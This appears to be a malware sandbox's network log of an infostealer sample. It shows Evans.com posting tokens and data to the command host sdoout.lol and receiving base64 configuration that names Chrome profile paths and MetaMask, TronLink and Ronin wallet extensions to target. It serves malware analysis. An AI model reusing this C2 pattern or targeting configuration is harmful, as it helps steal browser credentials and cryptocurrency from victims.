                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:07 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:07 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    7192.168.2.549993116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:08 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----3wtr1vkf37qim7q1dtj5
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:08 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 33 77 74 72 31 76 6b 66 33 37 71 69 6d 37 71 31 64 74 6a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 33 77 74 72 31 76 6b 66 33 37 71 69 6d 37 71 31 64 74 6a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 33 77 74 72 31 76 6b 66 33 37 71 69 6d 37 71 31 64 74 6a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------3wtr1vkf37qim7q1dtj5Content-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------3wtr1vkf37qim7q1dtj5Content-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------3wtr1vkf37qim7q1dtj5Cont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:08 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:09 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                    8192.168.2.54999440.115.3.253443
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:09 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 65 34 4d 70 51 75 30 6e 2b 45 43 42 66 78 39 41 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 36 65 33 63 31 34 35 33 66 66 37 30 34 32 34 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: CNT 1 CON 305MS-CV: e4MpQu0n+ECBfx9A.1Context: 96e3c1453ff70424
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:09 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:09 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 65 34 4d 70 51 75 30 6e 2b 45 43 42 66 78 39 41 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 36 65 33 63 31 34 35 33 66 66 37 30 34 32 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 36 79 43 6d 44 58 38 52 4d 4f 78 76 50 2b 35 4e 4f 72 49 4b 71 36 46 77 65 38 6a 6a 63 6d 42 78 67 58 43 4e 7a 45 37 4b 74 66 69 48 59 65 70 4d 67 33 65 2f 52 45 33 66 65 58 6a 50 31 57 31 67 4c 65 2f 57 51 35 6b 4a 37 36 50 52 75 51 77 45 4e 4c 71 31 74 72 54 76 58 32 2f 58 41 63 4d 41 2f 76 6f 35 4c 34 68 6a 43 6d 54 44
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: e4MpQu0n+ECBfx9A.2Context: 96e3c1453ff70424<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY6yCmDX8RMOxvP+5NOrIKq6Fwe8jjcmBxgXCNzE7KtfiHYepMg3e/RE3feXjP1W1gLe/WQ5kJ76PRuQwENLq1trTvX2/XAcMA/vo5L4hjCmTD
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:09 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 65 34 4d 70 51 75 30 6e 2b 45 43 42 66 78 39 41 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 36 65 33 63 31 34 35 33 66 66 37 30 34 32 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: e4MpQu0n+ECBfx9A.3Context: 96e3c1453ff70424<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:09 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:09 UTC58INData Raw: 4d 53 2d 43 56 3a 20 62 33 5a 63 33 41 4c 6b 74 6b 57 73 50 6a 53 4b 78 68 59 47 4e 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: MS-CV: b3Zc3ALktkWsPjSKxhYGNw.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    9192.168.2.549995116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:09 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----37q1nohlnycbieu3eu3o
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 332
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:09 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 33 37 71 31 6e 6f 68 6c 6e 79 63 62 69 65 75 33 65 75 33 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 33 37 71 31 6e 6f 68 6c 6e 79 63 62 69 65 75 33 65 75 33 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 33 37 71 31 6e 6f 68 6c 6e 79 63 62 69 65 75 33 65 75 33 6f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------37q1nohlnycbieu3eu3oContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------37q1nohlnycbieu3eu3oContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------37q1nohlnycbieu3eu3oCont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:10 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:10 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    10192.168.2.549996116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:11 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----q1va1d2d2v3w47ymophd
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 6937
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:11 UTC6937OUTData Raw: 2d 2d 2d 2d 2d 2d 71 31 76 61 31 64 32 64 32 76 33 77 34 37 79 6d 6f 70 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 71 31 76 61 31 64 32 64 32 76 33 77 34 37 79 6d 6f 70 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 71 31 76 61 31 64 32 64 32 76 33 77 34 37 79 6d 6f 70 68 64 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------q1va1d2d2v3w47ymophdContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------q1va1d2d2v3w47ymophdContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------q1va1d2d2v3w47ymophdCont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:11 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:11 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    11192.168.2.549997116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:12 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----q1va1d2d2v3w47ymophd
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 489
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:12 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 71 31 76 61 31 64 32 64 32 76 33 77 34 37 79 6d 6f 70 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 71 31 76 61 31 64 32 64 32 76 33 77 34 37 79 6d 6f 70 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 71 31 76 61 31 64 32 64 32 76 33 77 34 37 79 6d 6f 70 68 64 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------q1va1d2d2v3w47ymophdContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------q1va1d2d2v3w47ymophdContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------q1va1d2d2v3w47ymophdCont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:12 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:12 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    12192.168.2.549999142.250.186.1644436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:14 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:14 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:14 GMT
                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-BL1moe5z6pCUzpUf6FLdVw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:14 UTC124INData Raw: 39 64 32 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 67 69 61 6e 74 20 73 63 68 6e 61 75 7a 65 72 20 77 69 6e 73 20 64 6f 67 20 73 68 6f 77 22 2c 22 64 75 6e 65 20 70 72 6f 70 68 65 63 79 20 65 70 69 73 6f 64 65 20 37 20 72 65 6c 65 61 73 65 20 64 61 74 65 22 2c 22 69 64 61 68 6f 20 6c 6f 74 74 65 72 79 20 72 61 66 66 6c 65 22 2c 22 74 20 63 6f 72 6f 6e 61 65 20 62 6f 72 65
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 9d2)]}'["",["giant schnauzer wins dog show","dune prophecy episode 7 release date","idaho lottery raffle","t coronae bore
